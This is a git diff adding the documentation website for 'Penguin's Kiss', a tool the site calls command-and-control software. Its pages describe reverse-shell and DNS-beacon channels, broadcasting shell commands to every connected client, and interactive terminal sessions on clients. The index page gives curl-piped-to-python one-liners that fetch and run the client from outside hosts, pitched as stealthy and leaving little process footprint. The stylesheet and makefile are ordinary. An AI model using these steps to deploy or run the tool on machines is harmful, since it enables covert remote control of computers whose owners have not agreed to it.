+[pk] 27 total.</pre> + </section> + <section id="lq"> + <h3>lq</h3> + <p>Lists the queue of commands to be executed by newly connected clients.</p> + <p>Usage:</p> + <pre>pk> lq +['whoami', 'hostname']</pre> + </section> + <section id="cq"> + <h3>cq</h3> + <p>Clears the command queue.</p> + <p>Usage:</p> + <pre>pk> cq</pre> + </section> + <section id="show-serverkey"> + <h3>show-serverkey</h3> + <p>Prints the server's public key in a format easily copyable into an HDB + entry.</p> + <p>Usage:</p> + <pre>pk> show-serverkey +{"n": ..., "e": ...}</pre> + </section> + <section id="pty"> + <h3>pty</h3> + <p>Connects your screen to the specified client in a one-on-one terminal session, + similar to SSHing into the client machine.</p> + <p>Arguments: client ID (integer) — can be found with <code>lcli</code>.</p> + <p>Usage:</p> + <pre>$ pty 3</pre> + </section> + <section id="refresh-hdb"> + <h3>refresh-hdb</h3> + <p>Commands the client to refresh its internal hosts database from the web resource + it was originally pulled from.</p> + <p>Usage:</p> + <pre>$ refresh-hdb</pre> + </section> + <section id="tunnel"> + <h3>tunnel</h3> + <p>Commands the client to disconnect and sleep for the number of seconds configured + in <a href="/client#tts">TTS</a>.</p> + <p>Usage:</p> + <pre>$ tunnel</pre> + </section> + <section id="die"> + <h3>die</h3> + <p>Commands the client to exit and not respawn.</p> + <p>Usage:</p> + <pre>$ die</pre> + </section> + <section id="shell"> + <h3>Shell Commands</h3> + <p>Inputs which are not recognized as server commands will be interpreted as + shell commands, which will be blasted to all connected clients and queued for + future clients to receive as well. Once executed, the results of these + commands will be blasted to all active screens, and logged in case no screen + is watching at the time of the response. 
The active command queue can be + managed by way of the <a href="#lq">lq</a> and <a href="#cq">cq</a> + commands.</p> + </section> + <section id="target"> + <h3>Targeting</h3> + <p>In the event that you would prefer not to dispatch a command to all current and + future clients, a specific set of targets can be specified by prepending + <code>TARGET={targets}</code> to the command, where <code>{targets}</code> is + a comma-delimited list of client IDs (integers). These client IDs can be + retrieved by checking the output of <code>lcli</code>. Commands which are + targeted are not queued for future clients to receive.</p> + <p>Usage:</p> + <pre>$ TARGET=0,4,57,264 echo hello</pre> + </section> + </div> + </div> + </body> +</html> diff --git a/live/css/control.css b/live/css/control.css new file mode 100644 index 0000000..6a731ab --- /dev/null +++ b/live/css/control.css 
@@ -0,0 +1,134 @@ +@font-face { + font-family: 'Open Sans'; + src: url('/fonts/opensans.woff2') format('woff2'); + font-display: block; +} +@font-face { + font-family: 'Source Code Pro'; + src: url('/fonts/source-code-pro.woff2') format('woff2'); + font-display: block; +} +body,h1,h2,h3,h4,h5,h6,p,ul { + margin: 0; +} +a { + color: unset; + text-decoration: unset; +} +body { + font-family: 'Open Sans', sans-serif; + background-color: #3cb371; +} +#banner, #navigation { + background-color: #3cb371; +} +#banner { + height: 64px; + display: flex; + flex-direction: row; + align-items: center; + padding: 16px 48px; +} +#logo-img { + height: 64px; +} +#banner-buttons { + flex-grow: 1; + text-align: right; +} +#banner .button { + font-weight: bold; + margin-left: 4px; + padding: 10px 24px; + background-color: #f8f8f8; + border-radius: 8px; + box-shadow: 0px 0px 4px #00000080; +} +#banner .button:hover { + background-color: #f0f0f0; +} +#banner .button:active { + background-color: #f8f8f8; + box-shadow: none; +} +#page { + display: flex; + flex-direction: row; +} +#navigation { + min-width: 192px; + min-height: calc(100vh - 97px); + padding: 0px 32px; + font-family: 'Source Code Pro'; + font-size: 11pt; +} +.nav-heading { + font-family: 'Open Sans'; + font-size: 11.5pt; + font-weight: 700; +} +.nav-section { + list-style: none; + padding: 0; + margin-bottom: 4px; +} +#content { + flex-grow: 1; + padding: 24px 32px; + background-color: #f8f8f8; + border-top-left-radius: 4px; + box-shadow: inset 0px 0px 4px #00000080; + font-size: 11.5pt; +} +#content section { + margin: 16px 0px; +} +#content a { + color: #2d8238; + text-decoration: none; +} +#content a:hover { + color: #33b63f; +} +#content p, #content pre { + margin: 0px 0px 8px; +} +#content pre, #content code { + font-family: 'Source Code Pro', 'Courier New', Courier, monospace; + font-size: 10pt; + background-color: #e8e8e8; +} +#content code { + padding: 0px 2px; +} +#content pre { + padding: 4px 6px; +} +@media 
screen and (max-width: 750px) { + #banner { + padding: 16px 0; + justify-content: center; + } + #banner-buttons { + display: none; + flex-grow: 0; + } + #banner-logo { + text-align: center; + } + #navigation { + display: none; + min-width: 0; + min-height: 0; + } + #content { + padding: 12px 16px; + border-radius: unset; + font-size: 1.5rem; + } + #content pre, #content code { + font-size: 1.25rem; + white-space: unset; + text-wrap: wrap; + } +}
\ No newline at end of file diff --git a/live/favicon.ico b/live/favicon.ico Binary files differnew file mode 100644 index 0000000..d76f3a3 --- /dev/null +++ b/live/favicon.ico diff --git a/live/fonts/opensans.woff2 b/live/fonts/opensans.woff2 Binary files differnew file mode 100644 index 0000000..f4a0737 --- /dev/null +++ b/live/fonts/opensans.woff2 diff --git a/live/fonts/source-code-pro.woff2 b/live/fonts/source-code-pro.woff2 Binary files differnew file mode 100644 index 0000000..749efbc --- /dev/null +++ b/live/fonts/source-code-pro.woff2 diff --git a/live/hdb.html b/live/hdb.html new file mode 100644 index 0000000..31986c6 --- /dev/null +++ b/live/hdb.html 
@@ -0,0 +1,105 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Hosts Database | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/hdb" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> + <li><a 
href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>Now that we've generated our host key and gotten our server up and running, its + time to publish its public key in a hosts database file so that it can be retrieved + by clients. The TL;DR for this section is to create a file that looks like this:</p> + <pre>{"keys": {"<server ip>": {"n": <number n that python spit out>, "e": 65537}}}</pre> + <p>and upload it to the web somewhere. You can then supply this URL to your clients as + your hosts database. Literally even a PasteBin will work if you use the raw file + URL.</p> + <section id="format"> + <h3>Format</h3> + <p>The hosts database is essentially just a JSON object in which the PK client will + look for specific keys to retrieve information. 
The basic skeleton looks like + this:</p> + <pre>{"keys": {<keys section>}}</pre> + </section> + <section id="keys"> + <h3>Keys Section</h3> + <p>The keys section is just a mapping from server IPs to key objects, which in + turn are just a way of representing RSA public keys. The keys section supports + multiple server IPs, but currently only one public key per server IP. Its + skeleton looks like the following:</p> + <pre>{"0.1.2.3": {<key object>}, "255.255.255.255": {<key object>}}</pre> + <h4>Key Objects</h4> + <p>A key object is just a modulus and a public exponent, both of which are integers. + The modulus is at key <code>n</code> and the public exponent is at key + <code>e</code>. The public exponent is optional and defaults to + <code>65537</code> if not supplied. These values can be pulled directly from + <code>/etc/pk/server_key.json</code>, but it is important to delete the + <code>d</code> key and its value, as this information needs to remain secret. + </p> + <p>The format of a key object is as follows:</p> + <pre>{"n": 3043289324798327498257285749857984257249857245, "e": 12345}</pre> + </section> + </div> + </div> + </body> +</html> diff --git a/live/img/banner.png b/live/img/banner.png Binary files differnew file mode 100644 index 0000000..1d5d625 --- /dev/null +++ b/live/img/banner.png diff --git a/live/img/banner.webp b/live/img/banner.webp Binary files differnew file mode 100644 index 0000000..dae1345 --- /dev/null +++ b/live/img/banner.webp diff --git a/live/img/logo.png b/live/img/logo.png Binary files differnew file mode 100644 index 0000000..d2c7ce4 --- /dev/null +++ b/live/img/logo.png diff --git a/live/img/logo.webp b/live/img/logo.webp Binary files differnew file mode 100644 index 0000000..e4ab754 --- /dev/null +++ b/live/img/logo.webp diff --git a/live/index.html b/live/index.html new file mode 100644 index 0000000..a32d928 --- /dev/null +++ b/live/index.html 
@@ -0,0 +1,116 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Penguin's Kiss Command & Control Software | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul 
class="nav-section"> + <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>Penguin's Kiss is command and control software designed to accomodate a large + number of clients and controllers at once. Multiple channels are available for + end-to-end encrypted delivery of shell commands, including direct TCP reverse + shell, DNS beacon, and beacon-triggered direct connection. All information is sent + encrypted, either by padded RSA or by one-time pad exchanged over RSA (this helps + to keep short data snippets responsive and avoid ballooning message size). In the + future, some work may be done to incorporate elliptic curve cryptography and + one-time session keys utilizing some symmetric cipher (likely AES).</p> + <section id="download"> + <h3>Downloading PK</h3> + <p>The quickest way to download is via the button in the top right. This will take + you to the latest release on + <a href="https://github.com/cflems/pk">GitHub</a>. 
You can also clone the + <a href="https://github.com/cflems/pk/tree/master">master</a> (pseudo-stable) + or + <a href="https://github.com/cflems/pk/tree/develop">develop</a> (unstable) + branches to receive feature updates before they are bundled into a full + release.</p> + </section> + <section id="build"> + <h3>Building PK</h3> + <p>PK doesn't require much in the way of compilation, just bundling into a + single script that can be distributed or run. This functionality is written in + the makefile for easy access, so fetching and compilation should be as simple + as:</p> + <pre># or tar -xzf pk.tgz if you've downloaded an archive +git clone git@github.com:cflems/pk.git +cd pk +make</pre> + <p>Your built artifacts will be <code>pkcli.py</code> and <code>pkd.py</code>. + Building is required before PK can be run for the first time.</p> + </section> + <section id="precompiled"> + <h3>Precompiled Client Scripts</h3> + <p>Since cloning and building the latest version isn't the stealthiest + procedure to execute on a client machine, prebuilt versions of the latest + client script will be hosted in the several locations and can be executed + without meaningful process footprint as follows:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | ENV=... python3 -</pre> + <pre>curl -s https://war.cflems.net/pk.py | ENV=... python3 -</pre> + <p>You may wish to host your own, however, in order to tweak the default values + to your needs and avoid feeding them via enviornment variables.</p> + </section> + </div> + </div> + </body> +</html> diff --git a/live/server.html b/live/server.html new file mode 100644 index 0000000..c7dce69 --- /dev/null +++ b/live/server.html 
@@ -0,0 +1,131 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Server Configuration | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/server" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> 
+ <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>Once your PK scripts are built very little is required to run the server as a local + user, you can literally just do:</p> + <pre>python3 pkctl.py start +python3 pkctl.py attach</pre> + <p>and have yourself a simple instance up and running ready to run commands. Therefore + the rest of this section will be dedicated to getting PK running in the background + as a systemd service under its own user, and letting multiple system users attach + to the daemon at once if desired.</p> + <section id="install"> + <h3>Installing</h3> + <p>Once again the makefile mostly has you covered here, all you need to do is:</p> + <pre>sudo make install</pre> + <p>and the makefile will set up a dedicated service user and group called + <code>pkd</code> which controls access to the daemon and its resources, as well + as setting up the pk server as a systemd service called <code>pk</code>. 
This + will also start the pk server and enable it on startup.</p> + </section> + <section id="pkctl"> + <h3>PKCTL Usage</h3> + <p>Once installed, you can use the following commands to interface with the pk + daemon controller:</p> + <p><code>systemctl start|stop|restart pk</code> — this controls the + daemon's life cycle.</p> + <p><code>pkctl attach</code> — this starts an interactive session with the + daemon, allowing you to control and interface with clients.</p> + </section> + <section id="keygen"> + <h3>Host Key Generation</h3> + <p>Once you've installed the pk server you're going to want to change its + host key away from the default one which is used for testing purposes and is + widely available (read: not secure at all).</p> + <p>This is probably the only complicated part of the whole guide, mostly because + I haven't yet built a cute little utility to do it for you yet (I should + at some point). You're going to need to do the following (in your pk + directory):</p> + <pre>python3 +>>> import crypto +>>> p,q,n,e,d = crypto.Crypto.keygen(4096) +>>> n</pre> + <p>Copy the number that python spits out here.</p> + <pre> +>>> d</pre> + <p>Also copy this number. Keep these two handy as we'll need them later. + Now open <code>/etc/pk/server_key.json</code> in your favorite editor and make + it read as follows (you can wipe out the current contents):</p> + <pre>{"n": <the number n we got from python>, "d": <the number d we got from python>, "e": 65537}</pre> + <p>At this point we're almost done, we just have to restart pk to reflect the + changes, so run:</p> + <pre>sudo systemctl restart pk</pre> + <p>and you should be good to go.</p> + </section> + <section id="users"> + <h3>Local Users</h3> + <p>To allow non-root users on your system to use <code>pkctl attach</code>, you + will need to add them to the <code>pkd</code> user group. 
This is remarkably + simple to do on any unix system, just run:</p> + <pre>adduser [username] pkd</pre> + </section> + </div> + </div> + </body> +</html> diff --git a/makefile b/makefile new file mode 100644 index 0000000..4c90120 --- /dev/null +++ b/makefile @@ -0,0 +1,6 @@ +all: + php -f index.php >live/index.html + php -f client.php >live/client.html + php -f server.php >live/server.html + php -f hdb.php >live/hdb.html + php -f commands.php >live/commands.html diff --git a/server.php b/server.php new file mode 100644 index 0000000..4cbd1f0 --- /dev/null +++ b/server.php 
@@ -0,0 +1,74 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Server Configuration | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/server" /> + </head> +<?php +require('include/header.php'); +?> + <p>Once your PK scripts are built very little is required to run the server as a local + user, you can literally just do:</p> + <pre>python3 pkctl.py start +python3 pkctl.py attach</pre> + <p>and have yourself a simple instance up and running ready to run commands. Therefore + the rest of this section will be dedicated to getting PK running in the background + as a systemd service under its own user, and letting multiple system users attach + to the daemon at once if desired.</p> + <section id="install"> + <h3>Installing</h3> + <p>Once again the makefile mostly has you covered here, all you need to do is:</p> + <pre>sudo make install</pre> + <p>and the makefile will set up a dedicated service user and group called + <code>pkd</code> which controls access to the daemon and its resources, as well + as setting up the pk server as a systemd service called <code>pk</code>. 
This + will also start the pk server and enable it on startup.</p> + </section> + <section id="pkctl"> + <h3>PKCTL Usage</h3> + <p>Once installed, you can use the following commands to interface with the pk + daemon controller:</p> + <p><code>systemctl start|stop|restart pk</code> — this controls the + daemon's life cycle.</p> + <p><code>pkctl attach</code> — this starts an interactive session with the + daemon, allowing you to control and interface with clients.</p> + </section> + <section id="keygen"> + <h3>Host Key Generation</h3> + <p>Once you've installed the pk server you're going to want to change its + host key away from the default one which is used for testing purposes and is + widely available (read: not secure at all).</p> + <p>This is probably the only complicated part of the whole guide, mostly because + I haven't yet built a cute little utility to do it for you yet (I should + at some point). You're going to need to do the following (in your pk + directory):</p> + <pre>python3 +>>> import crypto +>>> p,q,n,e,d = crypto.Crypto.keygen(4096) +>>> n</pre> + <p>Copy the number that python spits out here.</p> + <pre> +>>> d</pre> + <p>Also copy this number. Keep these two handy as we'll need them later. + Now open <code>/etc/pk/server_key.json</code> in your favorite editor and make + it read as follows (you can wipe out the current contents):</p> + <pre>{"n": <the number n we got from python>, "d": <the number d we got from python>, "e": 65537}</pre> + <p>At this point we're almost done, we just have to restart pk to reflect the + changes, so run:</p> + <pre>sudo systemctl restart pk</pre> + <p>and you should be good to go.</p> + </section> + <section id="users"> + <h3>Local Users</h3> + <p>To allow non-root users on your system to use <code>pkctl attach</code>, you + will need to add them to the <code>pkd</code> user group. 
This is remarkably + simple to do on any unix system, just run:</p> + <pre>adduser [username] pkd</pre> + </section> +<?php +require('include/footer.php'); +?> +</html> |
